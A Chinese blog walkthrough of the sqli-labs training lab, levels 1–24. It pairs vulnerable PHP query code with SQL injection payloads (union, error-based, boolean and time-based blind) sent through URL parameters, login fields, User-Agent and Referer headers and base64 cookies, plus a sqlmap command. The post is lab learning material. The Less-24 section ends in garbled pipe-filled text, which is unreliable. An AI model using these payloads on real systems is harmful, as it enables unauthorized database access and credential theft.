Sqli-labs | iluem'Blog

Sqli-labs

发布 : 2020-07-20 分类 : Web 浏览 :

Sqli-labs学习记录

参考链接

Basic Challenges(1~20)

Less-1

id='$id'

源码逻辑

#查询语句
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
#查询到结果
if(true)
    print(result);
else
    print(error);

注入方式

联合

?id=0' union select 1,3,(select group_concat(' id:',id,' username:',username,' password:',password) from users)%23

报错

?id=0%27or updatexml(1,concat(0x7e,(select concat(id,' ',username,' ',password) from users limit 0,1)),1)%23

bool

?id=0' or ord(substr(database(),1,1))>114%23     //true
?id=0' or ord(substr(database(),1,1))>115%23     //false    

延时(用or会很慢,跟行数有关)

?id=1'and if(ord(substr(database(),1,1))<115,1,sleep(3))%23

sqlmap

python sqlmap.py -u "http://sqli.iluem.xyz/Less-1/?id=1" -p id --dbms=mysql --random-agent -v 3  --auth-type=Basic --auth-cred=user:pass  --current-db --technique=U(U、E、B、T)

Less-2

id=$id

几乎同Less-1,数字型,不赘述。

?id=-2 union select 1,(select group_concat(username,'~',password,'~')from users),2; -- -

Less-3

id=('$id')

?id=-2') union select 1,(select group_concat(username,'~',password,'~')from users),2-- -

Less-4

id=("$id")

http://2612018eu6.51vip.biz/sqli-labs/Less-4/?id=-2") union all select 1,2,(select database())-- -

Less-5

id='$id'

与前边不同的是没有回显了

if(true)
    {
      echo 'You are in...........';
      }
    else 
    {
    print_r(mysql_error());
    }

所以联合注入不能用了

剩下的还有报错、bool、延时,同1一样。

Less-6

id="$id"

与5利用方式一样

Less-7

id=(('$id'))

if($row)
    {
      echo 'You are in.... Use outfile......';
      }
    else 
    {
    echo 'You have an error in your SQL syntax';
    //print_r(mysql_error());
    }

由于这儿注释了mysql_error()不显示错误,因此只能用延时和布尔注入。

?id=1')) and if(ord(substr(database(),1,1))>115,1,sleep(3))%23

Less-8

id='$id'

同7,延时或者布尔

Less-9

id='$id'

if($row)
    {
      echo '<font size="5" color="#FFFF00">';    
      echo 'You are in...........';
      echo "<br>";
        echo "</font>";
      }
    else 
    {

echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";    
echo '<font color= "#0000ff" font size= 3>';    

}

无论对错回显都一样,只能用延时。同8

?id=1' and if(ord(substr(database(),1,1))>115,1,sleep(3))%23

Less-10

id="$id"

同9

?id=1" and if(ord(substr(database(),1,1))>115,1,sleep(3))%23

Less-11

$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

可以联合注入、报错注入、bool注入、延时注入。

#联合注入
uname=-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()%23&passwd=123
#报错注入
uname=-1' or extractvalue(0x0a,concat(0x0a,(select database())))%23&passwd=123
#bool
uname=-1'or ord(substr(database(),1,1))>114%23 &passwd=123 //true
uname=-1'or ord(substr(database(),1,1))>115%23 &passwd=123 //false
#延时注入
uname=admin' and if(ord(substr(database(),1,1))<115,1,sleep(3))%23 &passwd=123
#还是这个问题,如果用or前边不为真的话感觉会遍历整个表每一行,导致sleep执行了太多次。所以用一个表里有的admin吧

Less-12

    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"'; 
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
uname=1") or 1=1 %23&passwd=123

可以使用的方法同11

Less-13

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

#uname=admin') and if(ord(substr(database(),1,1))<115,1,sleep(3))%23 &passwd=123

不回显信息但登录成功与否的页面不同

因此不能使用联合注入了,方法同11

Less-14

只是和13闭合方式不同,其他同13

$uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"'; 
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
#uname=admin"and if(ord(substr(database(),1,1))<115,1,sleep(3))%23&passwd=123

Less-15

注释了报错信息,因此只能使用bool和延时注入了,闭合方式和14不同,其他同14

uname=1'or 1=1%23&passwd=123
uname=1'or 2=1%23&passwd=123

Less-16

多试几遍可以使用

uname=1")or 1=1%23&passwd=123

源码

$uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"'; 
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

同15,只是闭合方式换了,可以使用延时或者bool

Less-17

这一关开始检查输入了

function check_input($value)
    {
    if(!empty($value))
        {
        // truncation (see comments)
        $value = substr($value,0,15);
        }

        // Stripslashes if magic quotes enabled
        if (get_magic_quotes_gpc())
            {
            $value = stripslashes($value);
            }

        // Quote if not a number
        if (!ctype_digit($value))
            {
            $value = "'" . mysql_real_escape_string($value) . "'";
            }

    else
        {
        $value = intval($value);
        }
    return $value;
    }

$uname=check_input($_POST['uname']);  

$passwd=$_POST['passwd'];

@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
if(true)
    $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
    echo " You password has been successfully updated " ;    
    if (mysql_error())
        {
            print_r(mysql_error());
        }
        else
        {
            echo " You password has been successfully updated " ;        
        }
else
       echo "Bug off you Silly Dumb hacker";

但是这一关检查uname,select语句中用到了uname,所以不能利用,利用的点实在只要uname为真就执行的update语句

因为update执行错误会报错,因此我们可以构造如下payload

uname=admin&passwd=1' and (select updatexml(1,concat(0x7e,(select database())),1))%23

当然还可以使用延时

#延时注入
passwd=-1'and if(ord(substr(database(),1,1))<115,1,sleep(0.1))%23%23 &uname=admin

感觉无论passwd是真或者假,页面都会回显成功,因此不能使用bool

Less-18

知识点

  • $_SERVER['HTTP_CLIENT_IP'] 客户端可以伪造。
  • $_SERVER['HTTP_X_FORWARDED_FOR'],客户端可以伪造。
  • $_SERVER['REMOTE_ADDR'],客户端不能伪造。

此题目使用最后一个获取ip,故不能伪造。

源码大致逻辑

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
if(true)
    echo 'Your IP ADDRESS is: ' .$IP;
    $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
    echo 'Your User Agent is: ' .$uagent;
    print_r(mysql_error());            
else
    print_r(mysql_error());            
    echo "Try again looser";

这一关uname和passwd都被过滤了,因此只能通过insert这儿注入,因为,ip是不可控的,所以只能通过uagent。

最终请求体如下

POST /sqli-labs/Less-18/ HTTP/1.1
Host: 2612018eu6.51vip.biz
Content-Length: 20
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: 'or updatexml(1,concat(0x7e,(select database())),1),123,123)-- -
Origin: http://2612018eu6.51vip.biz
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://2612018eu6.51vip.biz/sqli-labs/Less-17/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fi;q=0.8
Connection: close

passwd=admin&uname=admin

payload如下

'or updatexml(1,concat(0x7e,(select database())),1),123,123)-- -

因为开启了报错,所以可以简单点使用报错注入,同时还可以使用的有延时

'or if(ord(substr(database(),1,1))>114,1,sleep(2)),123,123)-- -
'or if(ord(substr(database(),1,1))>115,1,sleep(2)),123,123)-- -

Less-19

源码大致如下

$uagent = $_SERVER['HTTP_REFERER'];
$IP = $_SERVER['REMOTE_ADDR'];
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
if(true)
    $insert="INSERT INTO `security`.`referers` (`referer`,         `ip_address`) VALUES ('$uagent', '$IP')";
    print_r(mysql_error());        
else
    print_r(mysql_error());    

跟18题几乎一致,不过注入点变为referer了

' or updatexml(1,concat(0x7e,(select database())),1),123)-- -

当然也可以延时盲注

'or if(ord(substr(database(),1,1))>115,1,sleep(2)),123)-- -

Less-20

if(cookie里没有uname)
    if(isset($_POST['uname']) && isset($_POST['passwd']))
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);
        $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        ···
else
    if(!isset($_POST['submit']))
        $cookee = $_COOKIE['uname'];
        $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
        if(查询结果为空)
            die('Issue with your mysql: ' . mysql_error());
        else
            echo 'Your Login name:'. $row['username'];            
            echo 'Your Password:' .$row['password'];    
            echo 'Your ID:' .$row['id'];
        ···

代码很长但逻辑很简单,uname和passwd还是不能注入。但是cookie里设置uname则很好注入。跟Less-1一样。都行

联合注入

uname=' union select 1,3,(select group_concat(' id:',id,' username:',username,' password:',password) from users)-- -

报错注入

uname=' or updatexml(1,concat(0x7e,(select database())),1)-- -

时间盲注

uname='or if(ord(substr(database(),1,1))<115,1,sleep(0.2))%23

布尔盲注

uname=' or ord(substr(database(),1,1))>114%23  
uname=' or ord(substr(database(),1,1))>115%23

Advanced Injections (21~38)

Less-21

从源码看与20几乎一致,唯一不同如下

$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
            $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";

因此编码一下就可以

联合注入

uname=JykgdW5pb24gc2VsZWN0IDEsMiwoc2VsZWN0IGdyb3VwX2NvbmNhdCgnIGlkOicsaWQsJyB1c2VybmFtZTonLHVzZXJuYW1lLCcgcGFzc3dvcmQ6JyxwYXNzd29yZCkgZnJvbSB1c2VycyktLSAt

报错注入

uname=Jykgb3IgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSksMSktLSAt

布尔注入

uname=Jykgb3Igb3JkKHN1YnN0cihkYXRhYmFzZSgpLDEsMSkpPjExNC0tIC0=
uname=Jykgb3Igb3JkKHN1YnN0cihkYXRhYmFzZSgpLDEsMSkpPjExNS0tIC0=

延时注入

uname=JylvciBpZihvcmQoc3Vic3RyKGRhdGFiYXNlKCksMSwxKSk8MTE1LDEsc2xlZXAoMC4yKSkj

Less-22

与21不同点如下

$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

其实几乎还是一样,只是拼接不同

uname="union select 1,3,(select group_concat(' id:',id,' username:',username,' password:',password) from users)-- -
#base64之后
uname=uname=InVuaW9uIHNlbGVjdCAxLDMsKHNlbGVjdCBncm91cF9jb25jYXQoJyBpZDonLGlkLCcgdXNlcm5hbWU6Jyx1c2VybmFtZSwnIHBhc3N3b3JkOicscGFzc3dvcmQpIGZyb20gdXNlcnMpLS0gLQ==

其他还是一样就跳过

Less-23

题目终于大变样了

if(isset($_GET['id']))
{
$id=$_GET['id'];
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if(true)
    echo 'Your Login name:'. $row['username'];
      echo 'Your Password:' .$row['password'];
else
    print_r(mysql_error());

因为过滤了注释符,所以闭合就好啦

想Less-1一样,都可以用

联合

?id=' union select 1,(select group_concat(' id:',id,' username:',username,' password:',password) from users), '

报错

?id=0%27or updatexml(1,concat(0x7e,(select concat(id,' ',username,' ',password) from users limit 0,1)),1) or '

bool

?id=0' or ord(substr(database(),1,1))>114 or '   //true
?id=0' or ord(substr(database(),1,1))>115 or '     //false    

延时(用or会很慢,跟行数有关)

?id=1'and if(ord(substr(database(),1,1))<115,1,sleep(3)) and '1

Less-24

这是一个很经典的二次注入,分析一下源码

  • index.php

image-20200804100801251

主页面主要记录表单信息,但是用户的输入会被过滤所以不存在敏感操作。

除了正常登录还有以下两个功能

  • 忘记密码:点击忘记密码会提示如果你忘记密码,Go ||||hack|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| E|||JM||||||||||||||SF|KL||||||||||||W||||||R”|||||||||||||||||||||||||||||I|||||||||||||||||||||

留下足迹